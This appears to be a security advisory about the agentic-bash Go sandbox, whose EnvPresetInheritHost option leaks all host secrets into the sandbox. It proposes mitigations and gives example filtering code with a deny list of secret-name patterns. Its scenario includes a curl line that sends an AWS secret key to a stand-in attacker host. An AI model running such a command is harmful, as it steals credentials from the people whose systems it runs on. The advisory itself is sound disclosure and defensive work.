Summary
When Options.EnvPreset = EnvPresetInheritHost is set, sandbox/session.go's hostEnvMap() copies the entire host process environment into the sandbox with zero filtering. Any secret present in the host environment — AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, DATABASE_URL, OPENAI_API_KEY, etc. — becomes visible to code running inside the sandbox.
Affected code
- sandbox/session.go:50-52 — unconditional env = hostEnvMap()
- sandbox/session.go:11-20 — hostEnvMap() copies all os.Environ() entries
Scenario
An AI agent framework embeds agentic-bash and uses EnvPresetInheritHost so the agent can use the same HOME and PATH as the host. The host process is authenticated to AWS. Inside the sandbox:
```sh
echo $AWS_SECRET_ACCESS_KEY # prints the real AWS secret key
curl https://exfil.attacker.com/?k=$AWS_SECRET_ACCESS_KEY # exfiltrates it
```
Impact
If the sandbox is used to run untrusted or partially-trusted code with EnvPresetInheritHost, all host credentials are exposed. Combined with network access (--network allow, the default), this enables trivial credential exfiltration.
This is a design choice, not a pure bug — but it is a significant footgun with no guardrails.
Fix / Mitigations
- Emit a runtime warning when EnvPresetInheritHost is used, listing common sensitive variable patterns (*_KEY, *_TOKEN, *_SECRET, *_PASSWORD)
- Add a SensitiveEnvFilter option: a list of patterns to strip from the inherited env before passing it to the sandbox
- Documentation: add a prominent warning in the Options.EnvPreset godoc and README that EnvPresetInheritHost exposes all host secrets to sandbox code
- Default to EnvPresetLinux: the current default is already EnvPresetLinux (clean env), which is correct, but this should be called out explicitly as the secure default.
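As an added illustration of the proposed SensitiveEnvFilter (example code written for this report, not code from agentic-bash), here is a filtering replacement for hostEnvMap() that applies the four suggested glob patterns to os.Environ() entries and returns the names it stripped so the runtime warning can be logged. The function names and the matching rule (case-insensitive shell globs on the variable name only) are assumptions.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Deny patterns from the report, matched case-insensitively as shell globs.
var defaultSensitivePatterns = []string{"*_KEY", "*_TOKEN", "*_SECRET", "*_PASSWORD"}

// isSensitive reports whether a variable name matches any deny pattern.
func isSensitive(name string, patterns []string) bool {
	for _, p := range patterns {
		if ok, _ := filepath.Match(strings.ToUpper(p), strings.ToUpper(name)); ok {
			return true
		}
	}
	return false
}

// filterHostEnv is a filtering stand-in for hostEnvMap(): it parses the
// KEY=VALUE entries os.Environ() returns, drops names matching a deny pattern
// and returns the dropped names so the caller can emit the proposed warning.
func filterHostEnv(environ, patterns []string) (map[string]string, []string) {
	env := make(map[string]string, len(environ))
	var dropped []string
	for _, kv := range environ {
		parts := strings.SplitN(kv, "=", 2)
		if len(parts) != 2 || parts[0] == "" {
			continue // malformed entry, never forward it
		}
		if isSensitive(parts[0], patterns) {
			dropped = append(dropped, parts[0])
			continue
		}
		env[parts[0]] = parts[1]
	}
	return env, dropped
}

func main() {
	// Stand-alone demo on the real host environment of this process.
	env, dropped := filterHostEnv(os.Environ(), defaultSensitivePatterns)
	fmt.Fprintf(os.Stderr, "EnvPresetInheritHost: kept %d, stripped %v\n", len(env), dropped)
}
```

Note that DATABASE_URL from the summary matches none of the four patterns and would still be inherited, so a deny-list is only a heuristic; the safe baseline remains the EnvPresetLinux default plus an explicit allow-list of the few variables (HOME, PATH) the agent actually needs.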
Severity
Low (by itself) — this is an opt-in preset that users choose. However, combined with other issues (subprocess escape, network allow), it becomes a High-severity data exfiltration vector.